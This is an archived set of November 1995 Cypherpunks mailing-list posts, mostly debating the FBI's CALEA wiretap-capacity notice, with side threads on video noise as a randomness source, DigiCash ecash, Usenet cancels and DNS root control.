And since "major cities" are "high interest" areas, the actual
number is more likely to approach one million or more.  Even
these figures don't tell the whole story.  The Justice Department
directives have a built-in vagueness that allows areas to be re-
defined.  They can become "high-interest" hotspots at any time,
under any circumstances.  A currency crisis, for instance.  Or a
hotly contested election.  Or perhaps a mysterious bombing
provocation in the midwest.

Furthermore, telephone companies do not have the luxury of
meeting the minimum surveillance requirements.  It's a
technological reality that they must modify their equipment to
meet the maximum requirements.  That's because the FBI can re-
define their surveillance responsibilities at any time, by
branding their customers as "interesting".  

As the FBI's "interest" shifts from area to area, the whole
country could rapidly come under the 1% surveillance directive.
1.5 million telephone intercepts.  Or more.

                      'ONLY 1,157 WIRETAPS'

The conduct of Clinton's law-enforcement leaders is especially
outrageous, now that the true intentions of their KGB-like
program have been revealed.  When FBI Director Louis Freeh
lobbied Congress for the Wiretap Bill last year, he cited FBI
statistics claiming only 1,157 federal, state, and local
electronic surveillance orders for all of 1993.  

In sworn Congressional testimony, the FBI director went on to say
that his bureau had been thwarted in "several" attempts to
intercept communications on specialized telephone equipment.
Freeh cited obstacles like digital switches, digital loops, and
similar privately owned, computerized business telephone
switching systems, which he claimed prevented his agents from
listening to telephone conversations, intercepting faxes, and
capturing the data exchanged in computer modem sessions.

The built-in interception capacity of at least 1.5 million phone
subscribers is well over 1,000 times the 1993 wiretapping number
given to Congress by Director Freeh. 

                   WRITE YOUR REPRESENTATIVES

The Justice Department instructed America's telephone companies
to respond by November 15th in writing (in triplicate) with
comments on their new national telephone surveillance
requirements.  Why not ask your elected representatives to drop
them a line, too?  Your Senators and Representative may well
wonder how Louis Freeh's 1,157 1993 surveillance orders and
"several" failed eavesdropping attempts turned into a license to
monitor over a million phones in the nation's telephone system in
less than two years.  I sure do wonder.

The "capacity requirements" for the 1994 Wiretap Law (CALEA) were
published in the Federal Register of October 16.  They are listed
on pages 53643-53646.  The address for comments is:
Telecommunications Industry Liaison Unit (TILU), Federal Bureau
of Investigation, P.O. Box 220450, Chantilly, VA 22022-0450.  The
FBI expects your representatives to write in triplicate.



     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 19:31:13 +0800
To: cypherpunks@toad.com
Subject: Re: video as a source of public randomness
Message-ID: <acbf02ca0402100496c4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:23 AM 11/3/95, JMKELSEY@delphi.com wrote:

>>From: tcmay@got.net (Timothy C. May)
>>Subject: Re: Video as a source of randomness
>
>>Digitized video input, especially from something like a noisy channel (t.v.
>>channel, for example), is quite likely to produce a lot more entropy bits
>>per second than nearly any of us ever need. (One's PGP key could be seeded
>>in a fraction of a millisecond, for example.)
>
>This seems like a potential source of a stream of public random
>bits.  If these can be authenticated and matched, this kind of thing
>can be useful in a lot of protocols.  For example, if there is some

I'm not sure what you mean by "public random bits"...I don't plan to share
my random bits with anyone, nor do I see any need for "public" random bits
(except for some well-known situations involving statistical testing, for
which certain PRNGs are actually preferable to "real" random numbers).

And so there's no confusion, when I said "like a noisy channel (t.v.
channel, for example)" I meant a snowy, noisy picture such as one gets with
rabbit ears on top of the set, especially when the channel is an unused
one. It is unlikely in the extreme that any attacker could deduce the snowy
pixel values used in the distillation of entropy.

(I'm not claiming this is the most practical source of randomness; I was
just responding to an earlier post about this.)

But back to the subject of "public random bits." Could you elaborate on
what you mean by this? (I assume you don't mean a one time pad that Alice
and Bob share, since that is really a separable issue from video as a
source of randomness. Only one of them will generate the pad, and will then
securely communicate it to the other.)

What am I missing?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 3 Nov 1995 10:11:43 +0800
To: hallam@w3.org
Subject: Re: ecash remailer
In-Reply-To: <9511021209.ZM7820@morgan.com>
Message-ID: <9511022349.AA01867@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:

 > >So, refuse to buy their money.
 > >Demand open systems.
 > One problem a number of people have reported in DigiCash is disappearing 
 > money. Several people have reported that if a transfer is misconfigured
 > the cash can flow out of the wallet, be rejected at the other end and
 > disappear from the system - i.e. misprinted names on cheques mean lost cash!
No. please get first hand facts. I have 'laundered' more than e$
18000, by small amounts of a couple of e$, and *no* bucks were lost(1). I
do have to manually cancel some and to refund ppl from time to time,
and i must admit I'm a bit behind my mail answering about that... but
the money is *not* lost [for everybody]
 > This is bad and they report that Digicash did not respond to their
 > complaints.

They prolly addresses the complaints to the wrong ppl, money does not
disapear as long as you keep the log files to be able to "cancel"
'lost' ebucks

There are/were a couple of small problems with the ecash software, but
no money is lost, as long as you have a consistent file system
[and I think they are working on an "auto recovery/auto cancel"
feature...]

note that there are some problems, initially the proposed shop
software sucked for instance... and writing a better one was a key to
get the system better, maybe it is a bit too early for real bank
also... I think some bugs are still hanging around... but the idea is
great ! [i just wish to have sources/protocol fully disclosed before I
put real money in it...]

ps : I have no interest in digicash whatsoever except being partipant
to the trial and having a small shop {and thus having an fairly large
account ;-)  I wish they give prices to 'good' shops ;-0)}

note1: at least I think no bucks were lost... not a high percentage at
least,... I did had some troubles with the first software version and
managed to *almost* lost stuff, my mismanipulation... but hey... if
your wallet has an hole, of if you throw away your money, you won't
whine to the ATM, would you ?

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cryptographic PLO Legion of Doom explosion Cocaine Castro Croatian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 4 Nov 1995 16:00:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net>
Message-ID: <199511030603.BAA24442@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


clarkm@cnct.com writes:
> > Last year, federal and state courts authorized 1,154 wiretaps, 
[...]
> > "People are starting to say that seems awfully high," Dempsey said, noting 
> > that the overall level of such surveillance activity is now a total of 
> > 20,000 to 25,000 intercepts nationwide over an entire year.
> 
> So what is it?  1,154 wiretaps?  Or 20,000?

For one thing, many conversations on a line may be intercepted over time
after the initial wiretap order is given. Also wiretapping is not the only 
form of electronic surveillance that tends to get reported in these numbers. 

The official federal wiretap reports for the last several years place the
number of wiretaps in the neighborhood of 1,000+ in each of those years. 

Actually the number 20,000 sounds strange -- it seems too high merely to be
a total of surveillance orders/operations, yet far too low to count all
interceptions. I recently heard the total number of conversations intercepted
per year in the U.S. estimated on the order of 2,000,000. Some rather small
percentage of those were categorized as "incriminating". I suppose it might
have been 1%, which would work out to 20,000 incriminating intercepted calls
per year nationwide.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 19:30:50 +0800
To: cypherpunks@toad.com
Subject: Re: Sources of randomness
Message-ID: <acbf085205021004e36c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:43 PM 11/2/95, Carl Ellison wrote:
>>Date: Thu, 2 Nov 1995 00:39:29 -0800
>>From: tcmay@got.net (Timothy C. May)
>
>>Digitized video input, especially from something like a noisy channel (t.v.
>>channel, for example), is quite likely to produce a lot more entropy bits
>>per second than nearly any of us ever need. (One's PGP key could be seeded
>>in a fraction of a millisecond, for example.)
>
>My cable feed into my Mac, for example, has surprisingly little noise --
>and it's only local noise (stuff only at my house, not available to the
>eavesdropper) which counts as entropy.

I meant a t.v. channel, as in broadcast t.v., such as is easily gotten with
rabbit ears, or nothing (since the idea is to get noise, from the ether, or
from the tuner itself). A snow-filled picture has pixels which are unlikely
in the extreme to be predicted/deduced by outside attackers, who cannot
know the details of antenna orientation, microscopic variations in
geometry, LRC, tuner sensitivity, etc. That is, snowy pictures are not
guessable.

(I'm not convinced that _cable_ signals are not random enough: my cable
picture is far from perfect, and my specific cable configuration and tuner
variations are certainly contributing to variability of the image pixels.
Granted, regularities in the image that are known to attackers--this is all
in theory, of course--will serve to reduce the entropy. But there's so much
bandwidth to burn that I suspect that even cable signals are OK to use. Of
course, removing the cable input is trivial and produces a spectacularly
snowy set of images....)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 17:32:54 +0800
To: clarkm@cnct.com
Subject: [NOISE, NOTE HEADERS] Re: FBI Wants to Wiretap One of Every 100 , Phones in Urban Areas
In-Reply-To: <9511031007.AA0024@localhost>
Message-ID: <Pine.ULT.3.91.951103001110.25597G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 Nov 1995 clarkm@cnct.com wrote:

> > On Fri, 3 Nov 1995 clarkm@cnct.kom wrote:
> > 
> > > Thanks for this item!  Two little excerpts jump out at me.
> > 
> > Gee, I hope they didn't spook you too badly when they jumped out at you 
> > like that. I can tell you're a little jumpy.
> 
> Hi Rich!  Thx for changing my domain, I'm sure it fooled SAIC.

I can only hope you're joking, but based on your last article, I'm not so
sure. That was intended as a small joke for anyone using PGP; see the
X-PGP-Key header in the original message. 

You really should have talked to Steve Pizzo before bastardizing his
article. Now you might get written up again as an example of the
conspiracy wackos on the net. I suppose you view any publicity as a
positive. I wholly support that goal. 

> > By whom is the FBI being sued? What is the case number? Who are the 
> > lawyers? What are their Bar numbers? How many times have they been 
> > disciplined for bringing frivolous suits?
> 
> EPIC.

EPIC has indeed made an FOIA claim and sued the FBI, but not for the
reasons stated, which is why I assumed you were talking about something
else. Again, Spotlight being vague about evidence that doesn't really
support their points. The case is C.A. No. 94-1720 (CRR) in D.C.  You can
write to the court for the full record, at duplication cost. 

I fully support EPIC's position. My apologies for confusing the message
with the second-hand, third-rate messenger. 

I notice you added Arnie Lerma to the recipient list. Didn't he publicly 
dissociate himself from you guys? Doesn't he have other things on his 
mind? I have another little joke just for him on my machine at 
gopher://dorms.stanford.edu:70/0R478556-480696-/win95netbugs et seq (the 
file actually goes all the way to byte 1149418).

[Big Bird deleted]

- -rich
 [Followups out of cpunks, please]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJnZhY3DXUbM57SdAQE0LgQArrZJMe0SUyScgQ/AVdJIfwNGIjpg7eqc
uIPQYs/1zx1edkL5hEhFaU3QnkJanRyxbNrx6sRLDv1veFqCFV8CHD9vmU1UFKMr
h9C+/B0wXB1JuhNmUK07I1ontVcCy6DDC12RR1Ar+yhFXbD6TsGY5ZF6S6KeDqjb
oV4R5rzFwaM=
=/3TK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Fri, 3 Nov 1995 14:41:31 +0800
To: perry@piermont.com
Subject: Re: Radiation Detectors from Aware Electronics
Message-ID: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     So what does this have to do with this mailing list??
     
     Skip


______________________________ Reply Separator _________________________________
Subject: Radiation Detectors from Aware Electronics
Author:  perry@piermont.com at internet
Date:    02-11-95 23:45


There have been several requests for information on the company that 
makes the radiation detectors with RS232 interfaces that I mentioned.
     
Here is how to reach them:
     
Aware Electronics
P.O. Box 4299
Wilmington, DE 19807
Phone (800) 729-5397
      (302) 655-3800
     
     
Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 4 Nov 1995 16:08:00 +0800
To: cypherpunks@toad.com
Subject: wiretaping ability and future plans
Message-ID: <01HX6STU0B649AO7EU@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 02 Nov 1995 01:55:06 -0800
>From: Jay Campbell <edge@got.net>
>Subject: FBI seeks huge wiretapping system

>FBI seeks huge wiretapping system
>BY JOHN MARKOFF
>New York Times

>``These are staggering numbers,'' said Mark Rasch, director of
>information security law and policy for Science Applications
>International Corp. in McLean, Va. ``Either they do a lot more
>wiretaps than they now admit, or they plan on doing a significant
>larger number of wiretaps in the future because of the fear of
>domestic terrorism.''

I can see at least two possible alternative explanations:

1.   The FBI envisions a time when voice-recognition systems will be
cheap enough to do "keyword searches" on digital voice in something
close to real time, with high accuracy.  This might be useful when
fishing for crime, dissent, etc.  It would certainly require some
rather broader powers, but they may expect this, especially if they
expect more acts of domestic and foreign terrorism.

2.   After implementing some kind of widespread escrowed crypto, the
FBI envisions recording lots of encrypted phone conversations,
perhaps targeted on suspiscious people, perhaps random.  Since the
whole conversation is encrypted, this might not violate any laws,
since they still have to get the warrant to recover the
conversation.  This would get them past the obvious practical
problem with most wiretap-based investigations--if you start your
wiretap three days after the target becomes a suspect, you've
probably missed all the juicy stuff.  Only a bit of carelessness or
stupidity on the part of your target will get the desired
information.

>   Jay Campbell                edge@got.net - Operations Manager
>   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
>   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJm0AUHx57Ag8goBAQGHTAP/XCsTUjb26sLB+UORMQCNjtBz2dhCjcF2
QkKfRjuUcBOG3z/nCeLDgfb1hWiiSYJwRhJOTG0dCcqS9k9gO//hpC4CsDz3y0Yw
mt5sG4X6POB+ljBfFOHqM7joekLmnmbodZQYdmiFTHbZ/Zn4w4obrTRjcPKhlQH9
Fctxd8JCYyg=
=ITxA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 4 Nov 1995 16:09:30 +0800
To: cypherpunks@toad.com
Subject: video as a source of public randomness
Message-ID: <01HX6SUGVCSI9AO7EU@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 02 Nov 1995 00:39:29 -0800
>From: tcmay@got.net (Timothy C. May)
>Subject: Re: Video as a source of randomness

>Digitized video input, especially from something like a noisy channel (t.v.
>channel, for example), is quite likely to produce a lot more entropy bits
>per second than nearly any of us ever need. (One's PGP key could be seeded
>in a fraction of a millisecond, for example.)

This seems like a potential source of a stream of public random
bits.  If these can be authenticated and matched, this kind of thing
can be useful in a lot of protocols.  For example, if there is some
packet structure in the digital video transmission which has at
least 160 bits of entropy, then we can take the SHA1(packet[i]) to be
public random bit block i.  (If we're worried about entropy, we can
collect arbitrarily large numbers of packets to hash per 160-bit
public random block.)

For large-scale, above ground protocols, these packets would need
some kind of signature or other authentication.  However, for
protocols that could handle having the public random string checked
offline later, this idea provides a reasonably good public random
string that can be used without any knowledge or consent of the
broadcaster/cable system/satellite system/whatever.  If the
transmission is sent under encryption, so much the better.  This
does still leave the possibility that an attacker could control the
broadcaster's transmissions for a few seconds, but this seems
unlikely in practice.

An alternative might be the encrypted transmissions from any
communications satellite.  How many telephone calls are your
opponents able to reroute?

>--Tim May, who has both audio and video digitizers built into his Power
>Macintosh 7100av, but notes that none of the crypto programs he uses has
>any provision for using them, and so he doesn't use them for crypto
>purposes.

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJmz3kHx57Ag8goBAQGYiwQAkx3dxUUcGjsEKqRAlc0CTq6EaTzBrLRz
ifrKgZPxfyD9F+sBTJGGPpHWc3mtfwJwV8HeIa/MY1Z1hpssN1ZY6ELlEn+4FFIA
3A+BNjB1PKrHebVZ0WHBJ3DI3h4/olF37bYNP261Uqd8CNig+fQ3VMtE0L0frBdr
I+izpEMOwiw=
=y7To
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee <gate@id.wing.net>
Date: Sat, 4 Nov 1995 21:20:47 +0800
To: cypherpunks@toad.com
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <199511030241.VAA26248@minerva.cis.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


FBI Wants to Wiretap One of Every 100 Phones in
Urban Areas


By MATT YANCEY

Associated Press Writer

WASHINGTON (AP) - The FBI wants the capability to simultaneously tap one 
of
every 100 phone and data transmission lines in major urban centers, but a 
top
Justice Department official said there are no plans to expand the existing 
number
of wiretaps.

As part of its effort to deal with a new breed of computer-savvy criminals 
adept
at using new telecommunications technologies, the FBI said it wants phone
companies to initially set aside 0.5 percent, or one of every 200 lines, 
for law
enforcement use in high-crime urban areas. But it added it also wants the 
ability
to rapidly expand that capability to one of every 100 lines if the need 
arises. The
disclosure was made in a little-noticed announcement in the Federal 
Register.

Despite the notice, Deputy Attorney General Jamie Gorelick said today, 
"There is
no intention to expand the number of wiretaps or the extent of wiretapping 
.. . I
don't think the American people should be worried about that."

Last year, federal and state courts authorized 1,154 wiretaps, of which 48 
percent
were sought by federal agents. Increases in recent years have mostly come 
in
drug trafficking cases. Gorelick acknowledged: "As we've gotten more 
aggressive
in the drug war, as organized gang activity has been an increased focus 
for us,
we've seen a slight increase."

The FBI proposal, unveiled on three pages of the thick daily compendium of
federal regulations and other government activities for Oct. 16, had been 
long
anticipated since the passage last year of the Communications Assistance 
for Law
Enforcement Act.

"The entire purpose of the digital telephony legislation was to leave law
enforcement in the same position it is now with respect to wiretaps: That 
is, to
ensure that emerging digital technology would not defeat current lawful
wiretaps," Gorelick said, noting that court approval would still be 
required for
any wiretap. "There appears to be some misunderstanding or 
miscommunication
as to the implications of what is contained in that notice."

But experts familiar with the law did not expect the FBI's reach into the 
world
new fiber optic cables, digital switches and high-speed modems for 
transmitting
business transactions as well as voices to be so sweeping.

"The level of capacity that the FBI is proposing here would come as a 
surprise to
many who supported the legislation," said James X. Dempsey, deputy 
director of
the Center for National Security Studies, a group that monitors government
surveillance activities.

While the federal notice does not specify which cities would be targeted, 
Dempsey
said New York is likely to be one of them. Assuming there are 2 million 
separate
phone and data transmission lines there, that means the FBI wants the 
ability to
tap 20,000 of them simultaneously, he said.

"People are starting to say that seems awfully high," Dempsey said, noting 
that
the overall level of such surveillance activity is now a total of 20,000 
to 25,000
intercepts nationwide over an entire year.

The FBI said in its official notice that its capability needs were based 
on "an
historical baseline of electronic surveillance activity" after surveying 
federal,
state and local courts, prosecutors and police agencies.

It did not offer a further explanation, but during hearings over the past 
four
years leading to passage of the 1994 law, FBI and other officials cited 
the
growing incidence of computer-based crimes.

The law was intended to remove what law enforcement officials have 
considered
a major impediment - the growing obsolescence of the copper phone wire - 
in
probing drug trafficking, organized crime, terrorism, kidnaping and 
sophisticated
new types of white-collar crime.

"Without this bill ... we would have been completely prevented in a very 
short
time from carrying out any court-approved wiretapping," FBI Director Louis
Freeh said at the time.

While law enforcement officers will still have to get court approval for 
any
wiretaps they install, the technological measures authorized by the law 
would
remove the objections of some judges.

Copper telephone lines were relatively easy to tap because they carried 
only one
conversation. But digital switches and fiber optics now in growing use 
often carry
hundreds of conversations or data transmissions at the same time, making 
it
difficult to isolate a single phone line.

The law authorized $500 million for the government to pay the phone 
companies
their cost in installing the necessary technology, but none of the money 
has been
appropriated.

And with increased criticism focused on the FBI for its role in the 1993 
Branch
Davidian siege in Waco, Texas, and the 1992 deadly standoff against white
separatist Randy Weaver in Ruby Ridge, Idaho, there is no assurance 
Congress
will be forthcoming with the money.

Legislation sent by President Clinton to Congress seeking greater wiretap
authority in the wake of the April bombing of the federal building in 
Oklahoma
City is languishing in congressional committees and is given little 
prospect of
being passed this year.



http://www.trib.com/NEWS/HEAD/FBI.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Fri, 3 Nov 1995 15:37:43 +0800
To: czeps@icis.on.ca
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <9511031007.AA0024@localhost>
MIME-Version: 1.0
Content-Type: text/plain


> On Fri, 3 Nov 1995 clarkm@cnct.kom wrote:
> 
> > Thanks for this item!  Two little excerpts jump out at me.
> 
> Gee, I hope they didn't spook you too badly when they jumped out at you 
> like that. I can tell you're a little jumpy.

Hi Rich!  Thx for changing my domain, I'm sure it fooled SAIC.

> > So what is it?  1,154 wiretaps?  Or 20,000?
> 
> Easy: both. 1,154 wiretaps, and 20K to 25K intercepts, which includes both 
> wiretaps and other interceptions, i.e., recording which phone numbers you 
> call but not actually listening to the conversations.
> 
> Get out of Dodge.

You get out of Dodge.

1,154 electronic surveillance orders, about 7,000 pen registers & trap/trace
plus 500 FISA warrants, all 1993 if memory serves.

Figures as supplied to EPIC, and from memory.

> By whom is the FBI being sued? What is the case number? Who are the 
> lawyers? What are their Bar numbers? How many times have they been 
> disciplined for bringing frivolous suits?

EPIC.

Quick!!  Fire up your index!

> > What's so special about the year 2002?  
> 
> Obviously, it is two elections from now, when the UN will invade the US 
> to impose the rule of the Anti-Christ.
> 
> Oops, I wasn't supposed to say that.

But now that you have...

Check out the wiretap stats and FOIA responses at http://www.epic.org and 
come back & quibble some more.
     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Fri, 3 Nov 1995 17:04:59 +0800
To: cypherpunks@toad.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <199511030134.BAA04330@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


This story broke on ABC radio news 26 hours ago.
It is still running as lead story.

Love Always,

Carol Anne...still amazed it's lead story
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 3 Nov 1995 18:53:21 +0800
To: cypherpunks@toad.com
Subject: Re: alt.anonymous.messages considered harmful
Message-ID: <199511031132.DAA08776@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>Those who do get the message, can not notice a cancel attack; those
>who don't, would have to carefully search for suspicious Supersedes:
>lines and monitor the control newsgroup. A denial of service attack by
>manipulated Path: header cannot be detected by the victim.

cancels aren't the only monster .. we have a vigilante up the pipe somewhere
deleting a chunk of every post set in certain alt.binaries.* groups without
a cancel - they're simply not passing along a piece of every set. this is
irritating (as an ISP) since it should be an individual site's
responsibility (if not the user emselve's), hence the term 'vigilante' as
opposed to 'concerned administrator'. the fix is to get multiple feeds, of
course, but everyone in the area happens to be fed through this branch ..
but i digress. 
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 3 Nov 1995 23:13:37 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: What!!!
In-Reply-To: <acbef6c303021004c367@[205.199.118.202]>
Message-ID: <Pine.3.89.9511030329.B15438-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 2 Nov 1995, Timothy C. May wrote:

> At 11:25 PM 11/2/95, tony266@vabeach.email.net wrote:
> 
> >Can someone tell me this cypherpunks is all about???
> 
> Grammar not best subject his. List sense make after read for time.
Quibble quibble. He's referring to cypherpunks the list in the singular, not
us the masses in the plural.
> 
> --Klaus!
> 
> More seriously, when you subscribed you undoubtedly got a "Welcome"
> message. I suggest you read it.
> 
Mayhap he's another person who's lists are gradually being fused into cpunks
due to mass forwarding :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 3 Nov 1995 18:48:43 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <199511031144.DAA08978@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>	Is it?  This is the _one_ thing in the article (is that term
>giving it too much legitimacy?) that I whought was barely true.  Whoever
>controls the root level DNS servers effectively controls the Internet.
>I postulated a couple of months ago about how the US Govt might attempt
>to censor the rest of the world: "Remove lurid.porno.site.other-country
>from your DNS system within 72 hours or we will remove references to
>your DNS servers from the root level servers.".  (I also speculated that
>if the US Govt tried doing this, that an 'underground' DNS system would
>form almost immediately.)

[off topic]

It almost did when InterNIC announced it's recent (and abrupt) new pricing
structure for domain names. All it would take is an additional entry in
{dns}/root.cache - even a small company with decent VC (and multiple
geographic locations, preferably) could have pulled this off and made a
decent chunk of change underselling InterNIC; with a slight shift in the way
things are done, the model could have been opened up into a competitive
market with price and (GASP!) customer service/response time wars. [FADE IN:
Look, Jim! I submitted my domain through Campbell.NET 30 seconds ago and
it's already live .. That's nothing, Terry, ...]

Yet another 'axiom' that turns out to be nothing more than convention.
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Fri, 3 Nov 1995 18:06:04 +0800
To: cypherpunks@toad.com
Subject: censored with Perry
Message-ID: <199511031355.HAA16831@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Enzo Michelangeli writes:

>In any case, before Perry (rightly) send us stern reminders of the scarce
>crypto relevance of this thread, let's take it out of Cypherpunks and,
>if someone is interested, let's continue by e-mail.

   Perry is again narrowly defining allowable speech on Cypherpunks.
Encryption becomes a trivial topic if its best medium is taken by the
States. Perry is still in his "only encryption algorithms in C is a
proper topic for Cypherpunks" mode. This is a direction that if followed
would take the vitality and relevance out of the Cypherpunks list. Perry
does a disservice for Cypherpunks.

   Since when did Cypherpunks become the mailing list fit for Perry? Perry
makes a big deal out of "nobody speaks for Perry" yet on Cypherpunks he
has decided that he sets the parameters for allowed speech. When did Perry
come to own the list? Where did he get this "authority" to tell other
Cypherpunks to shut up? As Perry often presumptiously and rudely reminds
C'punks that their speech is not tolerable, we must also take the time
and trouble to occasionally tell Perry to shove his opinions up his ass.

                                                         Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 3 Nov 1995 19:09:06 +0800
